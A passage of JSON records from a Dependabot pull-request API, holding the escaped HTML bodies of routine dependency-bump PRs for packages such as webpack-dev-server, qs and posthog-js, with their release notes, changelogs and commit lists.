Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n","html_url":"https://github.com/bameyrick/animated-weather-icon/pull/81","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/bameyrick%2Fanimated-weather-icon/issues/81","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/81/packages"},{"uuid":"4525930010","node_id":"PR_kwDORPhVPc7ffyuh","number":147,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 2 directories with 2 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-27T05:41:41.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-26T16:51:36.000Z","updated_at":"2026-05-27T05:41:50.000Z","time_to_close":46205,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":2,"packages":[{"name":"webpack-dev-server","old_version":"5.2.3","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"qs","old_version":"6.15.0","new_version":"6.15.2","repository_url":"https://github.com/ljharb/qs"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 1 update in the / directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /shared/demo-server directory: [qs](https://github.com/ljharb/qs).\n\nUpdates `webpack-dev-server` from 5.2.3 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.15.0 to 6.15.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + \u003ccode\u003eencodeValuesOnly\u003c/code\u003e instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/555\"\u003e#555\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/554\"\u003e#554\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/551\"\u003e#551\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/530\"\u003e#530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] fix grammar (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/550\"\u003e#550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: \u003ccode\u003eparameterLimit: Infinity\u003c/code\u003e with \u003ccode\u003ethrowOnLimitExceeded: true\u003c/code\u003e silently drops all parameters\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eiconv-lite\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/9aca4076fe788338c67cf7e115f0be6bc58d85a8\"\u003e\u003ccode\u003e9aca407\u003c/code\u003e\u003c/a\u003e v6.15.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5e33d33447ed0bf1ddab9abc41d27dea4687d992\"\u003e\u003ccode\u003e5e33d33\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41\"\u003e\u003ccode\u003e21f80b3\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + `e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a0a81ea2071acce3eff41a040f719ac8f5c4f64c\"\u003e\u003ccode\u003ea0a81ea\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/e3062f78f5233b338ceeb8e8dfa5a07dea4b32a8\"\u003e\u003ccode\u003ee3062f7\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/0c180a40adb8c6703fffc85b2ff06ca209f5c1e0\"\u003e\u003ccode\u003e0c180a4\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashi...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3a8b94aec19bd664720f6f6b1e66c4a0dfe4b656\"\u003e\u003ccode\u003e3a8b94a\u003c/code\u003e\u003c/a\u003e [Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/96755abd357c0e534dd3442a84a04d08864bfe0d\"\u003e\u003ccode\u003e96755ab\u003c/code\u003e\u003c/a\u003e [readme] fix grammar\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a419ce5bbfcdb98a299f1a0bb47ea055baef20e6\"\u003e\u003ccode\u003ea419ce5\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3f5e1c528c967d915096787efbffa73cf6044170\"\u003e\u003ccode\u003e3f5e1c5\u003c/code\u003e\u003c/a\u003e v6.15.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.15.0...v6.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/ptarmiganlabs/help-button.qs/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/ptarmiganlabs/help-button.qs/pull/147","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/ptarmiganlabs%2Fhelp-button.qs/issues/147","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/147/packages"},{"uuid":"4520807233","node_id":"PR_kwDOPL5Du87fPEmI","number":23,"state":"open","title":"chore(deps): bump the patches group with 8 updates","user":"dependabot[bot]","labels":["dependencies"],"assignees":[],"locked":false,"comments_count":4,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-26T02:20:56.000Z","updated_at":"2026-05-26T02:21:27.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"patches","update_count":8,"packages":[{"name":"posthog-js","old_version":"1.369.3","new_version":"1.376.0","repository_url":"https://github.com/PostHog/posthog-js"},{"name":"webpack","old_version":"5.105.4","new_version":"5.107.2","repository_url":"https://github.com/webpack/webpack"},{"name":"webpack-dev-server","old_version":"5.2.3","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"@babel/core","old_version":"7.29.0","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"@babel/preset-env","old_version":"7.29.2","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"@biomejs/biome","old_version":"2.4.9","new_version":"2.4.15","repository_url":"https://github.com/biomejs/biome"},{"name":"jsdom","old_version":"29.0.1","new_version":"29.1.1","repository_url":"https://github.com/jsdom/jsdom"},{"name":"vite","old_version":"8.0.8","new_version":"8.0.14","repository_url":"https://github.com/vitejs/vite"}],"path":null,"ecosystem":"npm"},"body":"Bumps the patches group with 8 updates:\n\n| Package | From | To |\n| --- | --- | --- |\n| [posthog-js](https://github.com/PostHog/posthog-js) | `1.369.3` | `1.376.0` |\n| [webpack](https://github.com/webpack/webpack) | `5.105.4` | `5.107.2` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.3` | `5.2.4` |\n| [@babel/core](https://github.com/babel/babel/tree/HEAD/packages/babel-core) | `7.29.0` | `7.29.7` |\n| [@babel/preset-env](https://github.com/babel/babel/tree/HEAD/packages/babel-preset-env) | `7.29.2` | `7.29.7` |\n| [@biomejs/biome](https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome) | `2.4.9` | `2.4.15` |\n| [jsdom](https://github.com/jsdom/jsdom) | `29.0.1` | `29.1.1` |\n| [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) | `8.0.8` | `8.0.14` |\n\nUpdates `posthog-js` from 1.369.3 to 1.376.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/PostHog/posthog-js/releases\"\u003eposthog-js's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eposthog-js@1.376.0\u003c/h2\u003e\n\u003ch2\u003e1.376.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/pull/3655\"\u003e#3655\u003c/a\u003e \u003ca href=\"https://github.com/PostHog/posthog-js/commit/6e8d3495d0a29076aeea5220e19e646aeb7f063f\"\u003e\u003ccode\u003e6e8d349\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/arnaudhillen\"\u003e\u003ccode\u003e@​arnaudhillen\u003c/code\u003e\u003c/a\u003e! - Expose the in-repo \u003ccode\u003e@posthog/rrweb\u003c/code\u003e, \u003ccode\u003e@posthog/rrweb-types\u003c/code\u003e, and \u003ccode\u003e@posthog/rrweb-plugin-console-record\u003c/code\u003e packages as subpath entry points on \u003ccode\u003eposthog-js\u003c/code\u003e. Consumers can now \u003ccode\u003eimport { Replayer } from 'posthog-js/rrweb'\u003c/code\u003e, \u003ccode\u003eimport type { eventWithTime } from 'posthog-js/rrweb-types'\u003c/code\u003e, and \u003ccode\u003eimport { LogLevel } from 'posthog-js/rrweb-plugin-console-record'\u003c/code\u003e instead of installing the underlying rrweb packages directly. The rrweb worker sourcemap (\u003ccode\u003eimage-bitmap-data-url-worker-*.js.map\u003c/code\u003e) is also shipped from \u003ccode\u003eposthog-js/dist/\u003c/code\u003e so downstream bundlers no longer need to reach into \u003ccode\u003enode_modules/@posthog/rrweb\u003c/code\u003e.\n(2026-05-22)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/pull/3639\"\u003e#3639\u003c/a\u003e \u003ca href=\"https://github.com/PostHog/posthog-js/commit/c806ccafdcc39b38e9554f8a17a8c2fbd3361dda\"\u003e\u003ccode\u003ec806cca\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/marandaneto\"\u003e\u003ccode\u003e@​marandaneto\u003c/code\u003e\u003c/a\u003e! - Use native async gzip compression for session recording events when CompressionStream is available.\n(2026-05-22)\u003c/li\u003e\n\u003cli\u003eUpdated dependencies [\u003ca href=\"https://github.com/PostHog/posthog-js/commit/c806ccafdcc39b38e9554f8a17a8c2fbd3361dda\"\u003e\u003ccode\u003ec806cca\u003c/code\u003e\u003c/a\u003e]:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​posthog/core\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.29.9\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​posthog/types\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.376.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eposthog-js@1.375.0\u003c/h2\u003e\n\u003ch2\u003e1.375.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/pull/3641\"\u003e#3641\u003c/a\u003e \u003ca href=\"https://github.com/PostHog/posthog-js/commit/2e1d5f4081c98a04e6a16f57e42491911453994d\"\u003e\u003ccode\u003e2e1d5f4\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dustinbyrne\"\u003e\u003ccode\u003e@​dustinbyrne\u003c/code\u003e\u003c/a\u003e! - Add \u003ccode\u003eflag_keys\u003c/code\u003e config to restrict browser feature flag remote evaluation to specific flag keys.\n(2026-05-21)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies [\u003ca href=\"https://github.com/PostHog/posthog-js/commit/2e1d5f4081c98a04e6a16f57e42491911453994d\"\u003e\u003ccode\u003e2e1d5f4\u003c/code\u003e\u003c/a\u003e]:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​posthog/types\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.375.0\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​posthog/core\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.29.8\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eposthog-js@1.374.4\u003c/h2\u003e\n\u003ch2\u003e1.374.4\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/pull/3638\"\u003e#3638\u003c/a\u003e \u003ca href=\"https://github.com/PostHog/posthog-js/commit/87e2145b5d09ed8a24df1fc337dad5c3c90c1b8a\"\u003e\u003ccode\u003e87e2145\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/marandaneto\"\u003e\u003ccode\u003e@​marandaneto\u003c/code\u003e\u003c/a\u003e! - Apply tracing headers to matching XMLHttpRequest requests\n(2026-05-21)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/pull/3646\"\u003e#3646\u003c/a\u003e \u003ca href=\"https://github.com/PostHog/posthog-js/commit/4f87827dda9c102a6deded986f2afd9fdddfb2e5\"\u003e\u003ccode\u003e4f87827\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/marandaneto\"\u003e\u003ccode\u003e@​marandaneto\u003c/code\u003e\u003c/a\u003e! - Avoid throwing or initializing PostHogProvider when no API key or client is provided\n(2026-05-21)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/pull/3645\"\u003e#3645\u003c/a\u003e \u003ca href=\"https://github.com/PostHog/posthog-js/commit/280832b50b4c058e010436c4aab861cb143577c1\"\u003e\u003ccode\u003e280832b\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/TueHaulund\"\u003e\u003ccode\u003e@​TueHaulund\u003c/code\u003e\u003c/a\u003e! - Capture \u003ccode\u003e\u0026lt;link rel=\u0026quot;stylesheet\u0026quot;\u0026gt;\u003c/code\u003e URLs from \u003ccode\u003elink.sheet.href\u003c/code\u003e and try \u003ccode\u003elink.sheet\u003c/code\u003e directly for inlining, so recordings survive SPA \u003ccode\u003ehistory.pushState\u003c/code\u003e navigations between routes of different path depths (where \u003ccode\u003elink.href\u003c/code\u003e re-resolves against a new baseURI but \u003ccode\u003elink.sheet.href\u003c/code\u003e preserves the URL the browser actually fetched).\u003c/p\u003e\n\u003cp\u003eShips the fix landed in \u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3635\"\u003e#3635\u003c/a\u003e, which only bumped the internal \u003ccode\u003e@posthog/rrweb-snapshot\u003c/code\u003e package — that package is bundled into 